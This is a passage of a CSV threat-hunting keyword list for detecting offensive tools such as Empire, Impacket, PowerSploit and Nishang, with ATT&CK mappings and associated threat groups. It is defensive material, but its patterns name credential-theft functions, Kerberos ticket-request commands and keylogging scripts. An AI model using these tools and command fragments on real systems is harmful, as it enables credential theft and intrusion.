T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SQLInstanceDomain.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLInstanceDomain.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SqlServerLinkCrawl*","offensive_tool_keyword","AD exploitation cheat sheet","Automatically find all linked databases","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLSysadminCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getST.py -k -no-pass -spn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*GetSyscallStub.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*Get-System.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SystemDNSServer.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SystemDNSServer.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SystemNamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getTGT.py -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*getTGT.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*gettgtpkinit.py -cert-pfx *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*gettgtpkinit.py -cert-pfx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gettgtpkinit.py -pfx-base64 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gettgtpkinit.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*Get-TimedScreenshot*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-UnattendSensitiveData*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-UnquotedService*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-USBKeystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-UserBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-UserPrivileges*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-UserPRTToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetUserSPNs.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*GetUserSPNs.vbs*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*Get-VaultCredential*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-VaultCredential*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-VaultCredential.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-VaultCreds*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-WebCredentials*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*GetWebDAVStatus.csproj*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*GetWebDAVStatus.sln*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 